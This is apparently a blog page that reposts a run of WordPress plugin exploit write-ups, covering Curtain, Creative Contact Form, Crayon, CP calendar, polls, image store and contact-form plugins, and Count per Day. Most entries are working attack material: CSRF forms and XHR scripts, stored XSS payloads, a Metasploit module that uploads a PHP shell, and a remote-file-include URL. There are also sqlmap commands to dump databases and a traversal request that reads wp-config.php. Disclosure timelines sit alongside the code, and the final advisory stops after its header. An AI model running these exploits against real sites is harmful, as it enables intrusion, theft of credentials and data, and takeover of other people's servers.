Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863141621

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: WordPress Plugin Curtain 1.0.2 - Cross-site Request Forgery (CSRF)
# Date: 24-03-2022
# Exploit Author: Hassan Khan Yusufzai - Splint3r7
# Vendor Homepage: https://wordpress.org/plugins/curtain/
# Version: 1.0.2
# Tested on: Firefox

## Summary:

Cross site forgery vulnerability has been identified in curtain WordPress plugin that allows an attacker to to activate or deactivate sites maintenance mode.

## Vulnerable URL:

http://localhost:10003/wp-admin/options-general.php?page=curtain&_wpnonce=&mode=0

## CSRF POC Exploit

```
<html>
  <body>
    <form action="http://localhost:10003/wp-admin/options-general.php">
      <input type="hidden" name="page" value="curtain" />
      <input type="hidden" name="&#95;wpnonce" value="" />
      <input type="hidden" name="mode" value="0" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```
HireHackking 
# Exploit Title: WordPress Plugin Current Book 1.0.1 - 'Book Title and Author field' Stored Cross-Site Scripting (XSS)
# Date: 14/07/2021
# Exploit Author: Vikas Srivastava
# Vendor Homepage:
# Software Link: https://wordpress.org/plugins/current-book/
# Version: 1.0.1
# Category: Web Application

How to Reproduce this Vulnerability:

1. Install WordPress 5.7.2
2. Install and activate Custom Book
3. Navigate to Tools >> Current Book and enter the XSS payload into the Book and Author input field.
4. Click Update Options
5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality at that time JavaScript payload is executing successfully and we are getting a pop-up.
HireHackking 
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::HTTP::Wordpress
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Wordpress Creative Contact Form Upload Vulnerability',
      'Description'    => %q{
        This module exploits an arbitrary PHP code upload in the WordPress Creative Contact
        Form version 0.9.7. The vulnerability allows for arbitrary file upload and remote code execution.
      },
      'Author'         =>
        [
          'Gianni Angelozzi', # Vulnerability discovery
          'Roberto Soares Espreto <robertoespreto[at]gmail.com>'  # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['EDB', '35057'],
          ['OSVDB', '113669'],
          ['WPVDB', '7652']
        ],
      'Privileged'     => false,
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [['Creative Contact Form 0.9.7', {}]],
      'DisclosureDate' => 'Oct 22 2014',
      'DefaultTarget'  => 0)
    )
  end

  def check
    check_plugin_version_from_readme('sexy-contact-form', '1.0.0')
  end

  def exploit
    php_pagename = rand_text_alpha(8 + rand(8)) + '.php'

    data = Rex::MIME::Message.new
    data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"files[]\"; filename=\"#{php_pagename}\"")
    post_data = data.to_s

    res = send_request_cgi({
      'uri'       => normalize_uri(wordpress_url_plugins, 'sexy-contact-form', 'includes', 'fileupload', 'index.php'),
      'method'    => 'POST',
      'ctype'     => "multipart/form-data; boundary=#{data.bound}",
      'data'      => post_data
    })

    if res
      if res.code == 200 && res.body =~ /files|#{php_pagename}/
        print_good("#{peer} - Our payload is at: #{php_pagename}. Calling payload...")
        register_files_for_cleanup(php_pagename)
      else
        fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}")
      end
    else
      fail_with(Failure::Unknown, 'ERROR')
    end

    print_status("#{peer} - Calling payload...")
    send_request_cgi(
      'uri'       => normalize_uri(wordpress_url_plugins, 'sexy-contact-form', 'includes', 'fileupload', 'files', php_pagename)
    )
  end
end
HireHackking 
source: https://www.securityfocus.com/bid/55919/info

The Crayon Syntax Highlighter plug-in for WordPress is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied input.

Exploiting these issues may allow a remote attacker to obtain sensitive information or to execute arbitrary script code in the context of the web server process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible.

Crayon Syntax Highlighter 1.12.1 is vulnerable; other versions may also be affected.

http://www.example.com/wordpress/wp-content/plugins/crayon-syntax-highlighter/util/ajax.php?wp_load=ftp://192.168.80.201/wp-load.php
HireHackking 
# Exploit Title: WordPress: cp-multi-view-calendar.1.1.4  [SQL Injection
vulnerabilities]
# Date: 2015-02-28
# Google Dork: Index of /wordpress/wp-content/plugins/cp-multi-view-calendar
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Vendor Homepage: http://wordpress.dwbooster.com/
# Software Link:
https://downloads.wordpress.org/plugin/cp-multi-view-calendar.1.1.4.zip
# Version: 1.1.5
# Tested on: windows 7 ultimate + sqlmap 0.9. It's php aplication
# OWASP Top10: A1-Injection
# Mitigations: Upgrade to version 1.1.5

Greetz to Christian Uriel Mondragon Zarate

Video demo of unauthenticated user sqli explotation vulnerability :



###################################################################

ADMIN PAGE SQL INJECTION
-------------------------------------------------

http://localhost/wordpress/wp-admin/admin-ajax.php?action=ajax_add_calendar

sqlinjection in post parameter viewid

-------------------------------------------------------------------

http://localhost/wordpress/wp-admin/admin-ajax.php?action=ajax_delete_calendar

sqlinjection in post parameter id


########################################

UNAUTENTICATED SQL INJECTION
-----------------------------------------------------------------

http://localhost/wordpress/?action=data_management&cpmvc_do_action=mvparse&f=edit&id=1

sql injection in id parameter

-----------------------------------------------------------------------

http://localhost/wordpress/?action=data_management&cpmvc_do_action=mvparse&f=datafeed&method=list&calid=1

datapost viewtype=list&list_order=asc vuln variable list_order


################################################################

CROSSITE SCRIPTING VULNERABILITY
----------------------------------------------------------

http://localhost/wordpress/?action=data_management&cpmvc_do_action=mvparse&weekstartday=alert(12)&f=edit&id=1

crosite script weekstartday parameter

###################################################

==================================

time-line

26-02-2015: vulnerabilities found
27-02-2015: reported to vendor
28-02-2015: release new cp-multi-view-calendar version 1.1.4
28-02-2015: full disclousure

===================================
HireHackking 
# Exploit Title: WordPress: cp-reservation-calendar 1.1.6  SQLi injection]
# Date: 2015-09-15
# Google Dork: Index of /wp-content/plugins/cp-reservation-calendar/
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Software Link: https://downloads.wordpress.org/plugin/cp-reservation-calendar.zip
# Version: 1.1.6
# OWASP Top10: A1-Injection

A vulnerability has been detected in the WordPress cp reservation calendar Plugin v1.6.
The vulnerability allows remote attackers to inject SQL commands.
The sql injection vulnerability is located in the `dex_reservations.php` file.
Remote attackers are able to execute own sql commands by manipulation of requested parameters. 

The security risk of the sql injection vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 8.6.
Exploitation of the remote sql injection web vulnerability requires no user interaction or privilege web-application user account.
Successful exploitation of the remote sql injection results in database management system, web-server and web-application compromise.

============================
vulnerable function code...
============================

function dex_reservations_calendar_load2() {
    global $wpdb;
	if ( ! isset( $_GET['dex_reservations_calendar_load2'] ) || $_GET['dex_reservations_calendar_load2'] != '1' )
		return;
    @ob_clean();
    header("Cache-Control: no-store, no-cache, must-revalidate");
    header("Pragma: no-cache");

    //following line is vulnerable...

    $calid = str_replace  (TDE_RESERVATIONCAL_PREFIX, "",$_GET["id"]);
    $query = "SELECT * FROM ".TDE_RESERVATIONCALENDAR_DATA_TABLE." where ".TDE_RESERVATIONDATA_IDCALENDAR."='".$calid."'";
    $row_array = $wpdb->get_results($query,ARRAY_A);
    foreach ($row_array as $row)
    {        
        $d1 =  date("m/d/Y", strtotime($row[TDE_RESERVATIONDATA_DATETIME_S])); 
        $d2 =  date("m/d/Y", strtotime($row[TDE_RESERVATIONDATA_DATETIME_E]));

        echo $d1."-".$d2."\n";
        echo $row[TDE_RESERVATIONDATA_TITLE]."\n";
        echo $row[TDE_RESERVATIONDATA_DESCRIPTION]."\n*-*\n";
    }

    exit();
}

The following URL executes vulnerable function:

http://localhost/wordpress/?action=dex_reservations_calendar_load2&dex_reservations_calendar_load2=1&id=1
------------------------------------------------------------------------------------
POC using sqlmap tool::::

python sqlmap.py --url="http://localhost/wordpress/?action=dex_reservations_calendar_load2&dex_reservations_calendar_load2=1&id=1"
 -p id --level=5 --risk=3 --dbms="MySQL" --dbs

##########################################################################

The following URL is too vulnerable

http://localhost/wordpress/?action=dex_reservations_check_posted_data

post parameters::::
-------------------------------------
dex_reservations_post=1&dex_item=1
------------------------------------

An unauthenticated user can use the following URL to inject malicious SQL code.
[dex_item] on POST parameter is vulnerable

======================
   vulnerable code 
=====================

is located in `dex_reservations.php`

function code..

function dex_reservations_get_option ($field, $default_value)
{
    global $wpdb, $dex_option_buffered_item, $dex_option_buffered_id;
    if ($dex_option_buffered_id == CP_CALENDAR_ID)
        $value = $dex_option_buffered_item->$field;
    else
    {
       $myrows = $wpdb->get_results( "SELECT * FROM ".DEX_RESERVATIONS_CONFIG_TABLE_NAME." WHERE id=".CP_CALENDAR_ID );
       $value = $myrows[0]->$field;
       $dex_option_buffered_item = $myrows[0];
       $dex_option_buffered_id  = CP_CALENDAR_ID;
    }
    if ($value == '' && $dex_option_buffered_item->calendar_language == '')
        $value = $default_value;
    return $value;
}


When this function is called the defined CP_CALENDAR_ID must contains an integer but it isn't validating the parameter
[ CP_CALENDAR_ID ]
---------------------------------------------------------------------------- 
POC using sqlmap tool::::

python sqlmap.py --url="http://localhost/wordpress/?action=dex_reservations_check_posted_data" --data="dex_reservations_post=1&dex_item=1"
 -p dex_item --dbms="MySQL" --level=5 --risk=3


 #############
 time-line

 2015-03-01: vulnerability found
 2015-03-09: reported to vendor
 2015-03-21-: released cp_reservation_calendar v1.1.7
 2015-09-15: full disclosure
HireHackking 
# Exploit Title: WordPress CP Polls 1.0.8 - CSRF - Update poll settings & Persistent XSS
# Date: 2016-02-22
# Google Dork: Index of /wp-content/plugins/cp-polls/
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Plugin URI: http://wordpress.dwbooster.com/forms/cp-polls
# Version: 1.0.8

=============
 Description
=============

With **CP Polls** you can publish a poll into a page/post and optionally display statistics of the results.
You can receive email notifications every time a vote is added or opt to receive Excel reports periodically.

The Polls can have dependant questions, this means that some questions are displayed depending of the
selection made on other questions.

(copy of README.txt)


===================
 Technical details
===================

CP Polls plugin for wordpress is vulnerable to Persistent Cross-site scripting is not sanitizing the
values of the options before savinng to database. This issue can be exploited by an attacker with
CSRF by sending a malicious link to a wordpress administrator. If administrator clicks the link, the
action will be executed because there isn't CSRF protection.

=========================
 Proof of Concept (html)
=========================

<html>
  <!-- CSRF PoC - Burp Suite i0 SecLab plugin -->
  <!-- We can find the Poll id into the source code of a post with a cp poll and looking for ´CP_Polls_id´.
  We can find something like: <input type="hidden" name="CP_Polls_id" value="4" />
  4 is the Poll's id, now we have the id and we can make a csrf attack.
   -->
<body>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http://localhost:80/wordpress/wp-admin/options-general.php?page=CP_Polls&cal=1", true);
        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
        xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
        xhr.setRequestHeader("Accept-Language", "es-MX,es-ES;q=0.9,es;q=0.7,es-AR;q=0.6,es-CL;q=0.4,en-US;q=0.3,en;q=0.1");
        xhr.withCredentials = true;
        var body = "CP_Polls_post_options=1&CP_Polls_id= [ Poll id to update! ]&poll_limit=2&poll_private_reports=false&poll_see_results=true&poll_text_seeres=  [PERSISTENT CODE INJECT HERE]  &poll_text_private=s&poll_text_votes=votes&fp_return_page=&form_structure=%5B%5B%7B%22form_identifier%22%3A%22%22%2C%22name%22%3A%22fieldname1%22%2C%22shortlabel%22%3A%22%22%2C%22index%22%3A0%2C%22ftype%22%3A%22fradio%22%2C%22userhelp%22%3A%22%22%2C%22userhelpTooltip%22%3Afalse%2C%22csslayout%22%3A%22%22%2C%22title%22%3A%22Select+a+Choice%22%2C%22layout%22%3A%22one_column%22%2C%22required%22%3Atrue%2C%22choiceSelected%22%3A%22%22%2C%22showDep%22%3Afalse%2C%22choices%22%3A%5B%22First+Choice%22%2C%22Second+Choice%22%2C%22Third+Choice%22%5D%2C%22choicesVal%22%3A%5B%22First+Choice%22%2C%22Second+Choice%22%2C%22Third+Choice%22%5D%2C%22choicesDep%22%3A%5B%5B%5D%2C%5B%5D%2C%5B%5D%5D%2C%22fBuild%22%3A%7B%7D%7D%5D%2C%5B%7B%22title%22%3A%22  [PERSISTENT CODE INJECT HERE]  %22%2C%22description%22%3A%22 [PERSISTENT CODE INJECT HERE]  %22%2C%22formlayout%22%3A%22top_aligned%22%2C%22formtemplate%22%3A%22%22%7D%5D%5D&vs_text_submitbtn=  [PERSISTENT CODE INJECT HERE]  &vs_text_previousbtn=Previous&vs_text_nextbtn=Next&vs_use_validation=true&vs_text_is_required=This+field+is+required.&cv_text_enter_valid_captcha=  [PERSISTENT CODE INJECT HERE]  .&vs_text_is_email=Please+enter+a+valid+email+address.&vs_text_datemmddyyyy=Please+enter+a+valid+date+with+this+format%28mm%2Fdd%2Fyyyy%29&vs_text_dateddmmyyyy=Please+enter+a+valid+date+with+this+format%28dd%2Fmm%2Fyyyy%29&vs_text_number=Please+enter+a+valid+number.&vs_text_digits=Please+enter+only+digits.&vs_text_max=Please+enter+a+value+less+than+or+equal+to+%7B0%7D.&vs_text_min=Please+enter+a+value+greater+than+or+equal+to+%7B0%7D.&fp_emailfrommethod=fixed&fp_from_email=admin%40localhost.com&fp_destination_emails=admin%40localhost.com&fp_subject=Contact+from+the+blog...&fp_inc_additional_info=true&fp_emailformat=text&fp_message=The+following+contact+message+has+been+sent%3A%0D%0A%0D%0A%3C%25INFO%25%3E%0D%0A%0D%0A&cu_enable_copy_to_user=false&cu_subject=Confirmation%3A+Message+received...&cu_emailformat=text&cu_message=Thank+you+for+your+message.+We+will+reply+you+as+soon+as+possible.%0D%0A%0D%0AThis+is+a+copy+of+the+data+sent%3A%0D%0A%0D%0A%3C%25INFO%25%3E%0D%0A%0D%0ABest+Regards.&cv_enable_captcha=false&cv_width=170&cv_height=60&cv_chars=5&cv_min_font_size=25&cv_max_font_size=35&cv_noise=200&cv_noise_length=4&cv_background=ffffff&cv_border=000000&cv_font=font-1.ttf&rep_enable=no&rep_days=1&rep_hour=0&rep_emails=&rep_subject=as&rep_emailformat=text&rep_message=Attached+you+will+find+the+data+from+the+form+submissions.&submit=Save+Changes";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i);
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>


################################################################################


# Exploit Title: WordPress CP Polls 1.0.8 - Reflected file download (.bat file)
# Date: 2016-02-22
# Google Dork: Index of /wp-content/plugins/cp-polls/
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Plugin URI: http://wordpress.dwbooster.com/forms/cp-polls
# Version: 1.0.8
# Demo: https://www.youtube.com/watch?v=uc6P59BPEkU

===================
 Technical details
===================

CP Polls plugin for wordpress is prone to file download issue. A hacker is able to attack an administrator by
exploiting a CSRF in the 'change cp poll name' converting the downloadable report file (csv) to a malicious .bat file.
Because there is not restriction in the cp poll name the CSRF exploit can change the name to ...

malicious.bat;

The semicolon (;) character must be restricted because the header 'Content-Disposition' uses this characteer as a
parameter delimitation. For example, when we change the name of a cp poll to 'malicious.bat;' when an administrator
download the report (thinking that is a csv file) the response header turns:
""
Content-Disposition: attachment; file=malicious.bat;.csv
""
the csv is ignored and the administrator gets a .BAT file


So, how to exploit this vulnerability to execute commands on the victim's machine?
Whe have an option. If the cp_poll is added in a post we can vote them and we can inject our malicious payload
into a votation.

==============================
 Proof of Concept CSRF (html)
==============================

https://www.youtube.com/watch?v=uc6P59BPEkU

==========================

If the csrf attack is succesful, we only need to inject our commands in votations. In ´fieldnames´ post parameter
 we can inject our commands.


################################################################################


# Exploit Title: WordPress CP Polls 1.0.8 - Cross-site file upload & persistent XSS
# Date: 2016-02-22
# Google Dork: Index of /wp-content/plugins/cp-polls/
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Plugin URI: http://wordpress.dwbooster.com/forms/cp-polls
# Version: 1.0.8

===================
 Technical details
===================

CP Polls plugin for wordpress is prone to persistent XSS via cross-site file upload.
When we register an cp_poll, it is sanitized correctly but when we upload a CSV file, we can
bypass the protection and inject malicious HTML/Javascript.

There are not CSRF protection in that action so it can be exploited with a CSRF attack by sending a
malicious link to a victim (administrator) a wait for execution of the malicious request.

=========================
 Proof of Concept (html)
=========================

<html>
<body>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http://<wp.host>/wp-admin/admin.php?page=CP_Polls&cal=1&list=1&import=1", true);
        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
        xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------17460754011784");
        xhr.setRequestHeader("Accept-Language", "es-MX,es-ES;q=0.9,es;q=0.7,es-AR;q=0.6,es-CL;q=0.4,en-US;q=0.3,en;q=0.1");
        xhr.withCredentials = true;
        var body = "-----------------------------17460754011784\r\n" +
          "Content-Disposition: form-data; name=\"importfile\"; filename=\"csv.csv\"\r\n" +
          "Content-Type: application/octet-stream\r\n" +
          "\r\n" +
          "2013-04-21 18:50:00, 192.168.1.12, <img src=x onerror=alert('You_are_owned!')>,
           \"<img src=x onerror=alert('I am scared!')>\", \"sample subject\", \"\"\r\n" +
          "-----------------------------17460754011784\r\n" +
          "Content-Disposition: form-data; name=\"pbuttonimport\"\r\n" +
          "\r\n" +
          "Import\r\n" +
          "-----------------------------17460754011784--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>


==========
 CREDITS
==========

Vulnerability discovered by:
	Joaquin Ramirez Martinez [i0 security-lab]
	joaquin.ramirez.mtz.lab[at]gmail[dot]com
	https://www.facebook.com/I0-security-lab-524954460988147/
	https://www.youtube.com/channel/UCe1Ex2Y0wD71I_cet-Wsu7Q


========
TIMELINE
========

2016-02-10 vulnerability discovered
2016-02-22 reported to vendor
2016-03-01 released cp polls v1.0.9
2016-03-01 public disclousure
HireHackking 
# Exploit Title: WordPress cp-multi-view-calendar.1.1.7  [Unauthenticated SQL injection vulnerabilities]
# Date: 2015-07-10
# Google Dork: Index of /wordpress/wp-content/plugins/cp-multi-view-calendar
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Vendor Homepage: http://wordpress.dwbooster.com/
# Software Link: https://downloads.wordpress.org/plugin/cp-multi-view-calendar.1.1.7.zip
# Version: 1.1.7
# Tested on: windows 7 + sqlmap 0.9. 
# OWASP Top10: A1-Injection


====================
 DESCRIPTION
====================

Multiple SQL Injection vulnerabilities has been detected in the Wordpress cp-multi-view-calendar plugin in version 1.1.7 .
The vulnerability allows remote attackers to inject own sql commands to compromise the affected web-application and connected dbms. 

The SQL Injection vulnerabilities are located in the `edit.php` and `datafeed.php` files.
Remote attackers are able to inject own sql commands to the vulnerable parameters value in these files GET/POST method request.

The remote sql injection web vulnerability can be exploited by remote attackers without privileged application user account 
and without required user interaction. Successful exploitation of the sql injection vulnerability results in application and 
web-service or dbms compromise.

===================
 Severity Level
===================
Critical


=================================
 AFFECTED URLs AND PARAMETER(S)
=================================

http://localhost/wordpress/?action=data_management&cpmvc_do_action=mvparse&f=edit&id=[SQLi]

Vulnerable parameter: `id`

Explotation technique: blind (time-based) , union query based.

-------------------------------------------------------------------

http://localhost/wordpress/?action=data_management&cpmvc_do_action=mvparse&f=datafeed&method=remove&rruleType=del_only&calendarId=[SQLi]

Vulnerable parameter: `calendarId`

Explotation technique: blind (boolean based, time based), error based.

-----------------------------------------------------------------------

http://localhost/wordpress/?action=data_management&cpmvc_do_action=mvparse&f=datafeed&method=adddetails&id=1&calid=[SQLi]

Vulnerable parameter: `calid`

Explotation technique: blind (boolean based, time based)

-----------------------------------------------------------------------


it isn't all sqli vulnerabilities, but these are the vulnerable functions:


In file datafeed.php

-checkIfOverlapping(...) 
-updateDetailedCalendar(...)
-removeCalendar(...)


In file edit.php
 
-getCalendarByRange(...)


   ... I think this is all..


Sorry. I didn't have much time for this report.

==================================

time-line

2015-07-01: vulnerabilities found
2015-07-09: reported to vendor
2015-07-10: 
2015-07-12: 

===================================
HireHackking 
# Exploit Title: WordPress CP Image Store with Slideshow 1.0.5  [Arbitrary file download vulnerability]
# Date: 2015-07-10
# Google Dork: 
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Vendor Homepage: http://wordpress.dwbooster.com/
# Software Link: https://downloads.wordpress.org/plugin/cp-image-store.1.0.5.zip
# Version: 1.0.5
# Tested on: windows 7 + firefox. 

====================
 DESCRIPTION
====================

A vulnerability has been detected in the WordPress CP Image Store with Slideshow plugin in version 1.0.5 .
The vulnerability allows remote attackers to download arbitrary files from the server.
The Arbitrary file download vulnerability is located in the `cp-image-store.php` file.

The web vulnerability can be exploited by remote attackers without privileged application user account 
and without required user interaction. Successful exploitation of the Arbitrary file download vulnerability results 
in application compromise.

==============
 POC
==============

   # http://wp-host/wp-path/?action=cpis_init&cpis-action=f-download&purchase_id=1&cpis_user_email=i0SECLAB@intermal.com&f=../../../../wp-config.php HTTP/1.1
   
   the purchase_id parameter can be bruteforced and succesfully exploit this vulnerability.

   
==================
 VULNERABLE CODE
==================

Located in cp-image-store.php

function cpis_download_file(){
	...
		
	if( isset( $_REQUEST[ 'f' ] ) && cpis_check_download_permissions() ){
		header( 'Content-Type: '.cpis_mime_content_type( basename( $_REQUEST[ 'f' ] ) ) );
		header( 'Content-Disposition: attachment; filename="'.$_REQUEST[ 'f' ].'"' );
		if( cpis_checkMemory( array( CPIS_DOWNLOAD.'/'.$_REQUEST[ 'f' ] ) ) ){
			readfile( CPIS_DOWNLOAD.'/'.$_REQUEST[ 'f' ] );
		}else{
			@unlink( CPIS_DOWNLOAD.'/.htaccess');
			header( 'location:'.CPIS_PLUGIN_URL.'/downloads/'.$_REQUEST[ 'f' ] );
		}
	...
} 

==================================

time-line

2015-07-01: vulnerability found
2015-07-09: reported to vendor
2015-07-10: released CP Image Store with Slideshow new version 1.0.6
2015-07-10: full disclosure

===================================
HireHackking 
# Title: Cross-Site Request Forgery, Cross-Site Scripting and SQL Injection
in CP Contact Form with Paypal Wordpress Plugin v1.1.5
# Submitter: Nitin Venkatesh
# Product: CP Contact Form with Paypal Wordpress Plugin
# Product URL: https://wordpress.org/plugins/cp-contact-form-with-paypal/
# Vulnerability Type: Cross-site Request Forgery [CWE-352], Cross-site
scripting[CWE-79], Improper Neutralization of Special Elements used in an
SQL Command ('SQL Injection')[CWE-89]
# Affected Versions: v1.1.5 and possibly below.
# Tested versions: v1.1.5
# Fixed Version: v1.1.6
# Link to code diff:
https://plugins.trac.wordpress.org/changeset?new=1166955%40cp-contact-form-with-paypal&old=1162550%40cp-contact-form-with-paypal
# Changelog:
https://wordpress.org/plugins/cp-contact-form-with-paypal/changelog/
# CVE Status: None/Unassigned/Fresh

## Product Information:

With CP Contact Form with Paypal you can insert a contact form into a
WordPress website and connect it to a PayPal payment.

## Vulnerability Description:

The forms in the admin area of the plugin allows CSRF. This gives the
capacity for the attacker to add new forms, modify existing form settings,
launch XSS attacks, export CSV files of the messages, delete forms, and
perform SQL Injection.

## Proof of Concept:

<h3>CSRF - Action Links</h3>
<ul>
<li><a href="
http://localhost/wp-admin/admin.php?page=cp_contact_form_paypal&a=1&r=0.9305673889626347&name=csrf1">Create
form/item</a></li>
<li><a href="
http://localhost/wp-admin/admin.php?page=cp_contact_form_paypal&cal=2&list=1&search=&dfrom=&dto=&cal=2&cp_contactformpp_csv=Export+to+CSV">Export
to CSV</a></li>
<li><a href="
http://localhost/wp-admin/admin.php?page=cp_contact_form_paypal&c=2&r=0.4520871591860098">
Clone form/item</a></li>
<li><a href="
http://localhost/wp-admin/admin.php?page=cp_contact_form_paypal&u=6&r=0.558320934244582&name=csrf1">Update
form/item</a></li>
<li><a href="
http://localhost/wp-admin/admin.php?page=cp_contact_form_paypal&d=3&r=0.2828470980050731">Delete
form/item</a></li>
</ul>


<h3>CSRF, XSS, SQLi - Settings form</h3>
<form action="
http://localhost/wp-admin/admin.php?page=cp_contact_form_paypal&cal=11&r=0.81280830806042"
method="post">
<input type="hidden" name="cp_contactformpp_post_options" value='' />

<!--
if cp_contactformpp_id is injected with XSS, the other script vectors won't
work
<input type="hidden" name="cp_contactformpp_id"
value='"><script>alert(3);</script>' />

SQL injection possible cp_contactformpp_id
<input type="hidden" name="cp_contactformpp_id" value="1 AND SLEEP(25)" />
-->

<input type="hidden" name="cp_contactformpp_id" value='11' />
<input type="hidden" name="fp_from_email" value='asd@evilcorp.org' />
<input type="hidden" name="fp_message" value='The following contact message
has been sent:<%INFO%>&lt;/textarea&gt;<script>alert(1);</script>' />
<input type="hidden" name="cu_message" value='Thank you for your message.
We will reply you as soon as possible.This is a copy of the data
sent:<%INFO%>Best Regards.&lt;/textarea&gt;<script>alert(2);</script>' />
<input type="hidden" name="submit" value='Save Changes' />
<input type="submit" value="submit" />
</form>

## Solution:

Upgrade to v1.1.6

## Disclosure Timeline:

2015-05-19 - Discovered. Contacted developer on support forums.
2015-05-20 - Mailed developer initial report
2015-05-25 - Patched v1.1.6 released
2015-07-09 - Publishing disclosure to FD

## Disclaimer:

This disclosure is purely meant for educational purposes. I will in no way
be responsible as to how the information in this disclosure is used.
HireHackking 
# Exploit Title: WordPress Plugin CP Blocks 1.0.14 - Stored Cross Site Scripting (XSS)
# Date: 2022-02-02
# Exploit Author: Shweta Mahajan
# Vendor Homepage: https://wordpress.org/plugins/cp-blocks/
# Software Link: https://wordpress.org/plugins/cp-blocks/
# Tested on Windows
# CVE: CVE-2022-0448
# Reference:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0448
https://wpscan.com/vulnerability/d4ff63ee-28e6-486e-9aa7-c878b97f707c

How to reproduce vulnerability:

1. Install Latest WordPress

2. Install and activate CP Blocks Version 1.0.14

3. Navigate to CP Blocks - License >> enter the payload into 'License ID'.

4. Enter JavaScript payload which is mentioned below
   "><script>alert(0)</script>

5. You will observe that the payload successfully got stored into the
    database and when you are triggering the same functionality at that
    time JavaScript payload gets executed successfully and we'll get a
    pop-up.
HireHackking 
Stored Cross-Site Scripting vulnerability in Count per Day WordPress Plugin

Abstract

A Cross-Site Scripting vulnerability was found in the Count per Day WordPress Plugin. This issue can be exploited by an unauthenticated attacker and allows an attacker to perform a wide variety of actions, such as stealing users' session tokens, or performing arbitrary actions on their behalf. In order to exploit this issue, the attacker has to lure/force a victim into opening a malicious website/link.

Contact

For feedback or questions about this advisory mail us at sumofpwn at securify.nl

The Summer of Pwnage

This issue has been found during the Summer of Pwnage hacker event, running from July 1-29. A community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam.

OVE ID

OVE-20160717-0001

Tested versions
This issue was successfully tested on Count per Day WordPress Plugin version 3.5.4.

Fix
This issue is resolved in Count per Day version 3.5.5.

Introduction

The Count per Day WordPress Plugin shows reads and visitors per page, visitors today, yesterday, last week, last months and other statistics. A Cross-Site Scripting vulnerability was found in the Count per Day WordPress Plugin. This issue can be exploited by an unauthenticated attacker and allows an attacker to perform a wide variety of actions, such as stealing users' session tokens, or performing arbitrary actions on their behalf. In order to exploit this issue, the attacker has to lure/force a victim into opening a malicious website/link.

Details

When manipulating the referer header by putting in javascript: it will be rendered on the admin page within the referers list as a a href attribute. When admin (or above author level) clicks on it the XSS gets executed.

Tags get stripped so it's not possible to execute the XSS directly on load. Single and double quotes are escaped, but can be worked around. Example:

Referer: javascript:c=String.fromCharCode;alert(c(83)+c(117)+c(109)+c(79)+c(102)+c(80)+c(119)+c(110)+c(46)+c(110)+c(108))


The referer list shows the top 20. But its easy to get your attack referer in the top by just looping with unique x-forwarded-for ip's. By default referers are stored (but can be turned off in the settings of the plugin). Up to 150 chars of the referer are stored (can be changed to 500 max).

Proof of concept

GET / HTTP/1.1
Host: <target>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8,nl;q=0.6
x-forwarded-for: 1.1.1.5
Referer: javascript:c=String.fromCharCode;alert(c(83)+c(117)+c(109)+c(79)+c(102)+c(80)+c(119)+c(110)+c(46)+c(110)+c(108))
Connection: close
HireHackking 
Advisory ID: HTB23267
Product: Count Per Day WordPress plugin
Vendor: Tom Braider 
Vulnerable Version(s): 3.4 and probably prior
Tested Version: 3.4
Advisory Publication:  July 1, 2015  [without technical details]
Vendor Notification: July 1, 2015 
Vendor Patch: July 1, 2015 
Public Disclosure: July 22, 2015 
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2015-5533
Risk Level: Medium 
